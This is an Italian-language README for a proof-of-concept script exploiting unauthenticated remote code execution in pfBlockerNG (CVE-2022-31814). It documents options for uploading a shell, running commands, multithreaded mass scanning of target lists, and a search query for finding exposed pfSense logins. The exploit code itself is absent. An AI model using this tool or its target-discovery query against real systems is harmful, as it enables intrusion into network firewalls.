
pfBlockerNG <= 2.1.4_26 RCE non autenticata (CVE-2022-31814)
Questo script è un exploit proof-of-concept per pfBlockerNG <= 2.1.4_26 che consente l'esecuzione remota di codice. Prende un singolo URL di destinazione o una lista di URL, carica una shell, esegue un comando e poi cancella la shell.
Questo script richiede Python 3.x e i moduli requests e concurrent.futures. Puoi installare questi moduli eseguendo:
pip3 install requests concurrent.futures
oppure
pip3 install -r requirements.txt
usage: exploit.py [-h] [-c COMMAND] [-l LIST] [-i IP] [-t THREADS] [-o OUTPUT]
pfBlockerNG <= 2.1.4_26 RCE Non Autenticata
options:
-h, --help mostra questo messaggio di aiuto ed esce
-c COMMAND, --command COMMAND
Comando della console ('id')
-l LIST, --list LIST Lista dei target (list.txt)
-i IP, --ip IP URI di base del target (es. http://target-uri/)
-t THREADS, --threads THREADS
Numero di thread per scansione di massa
-o OUTPUT, --output OUTPUT
File di output (vuln.txt)
Per sfruttare un singolo target, usa il flag -i o --ip e specifica l'URL base o l'indirizzo IP:
python3 exploit.py -i http://target-uri/ -c 'id'
Per scansionare una lista di target, usa il flag -l o --list e specifica il percorso della lista:
python3 exploit.py -l list.txt -c 'id' -t 50
Il flag -t o --threads può essere usato per specificare il numero di thread da utilizzare per la scansione.
Se viene specificato il flag -o o --output, la lista dei target vulnerabili verrà scritta in un file:
python3 exploit.py -l list.txt -c 'id' -o vuln.txt
http.title:"pfSense - Login" "Server: nginx" "Set-Cookie: PHPSESSID="
Questo script è solo a scopo educativo. Usalo a tuo rischio.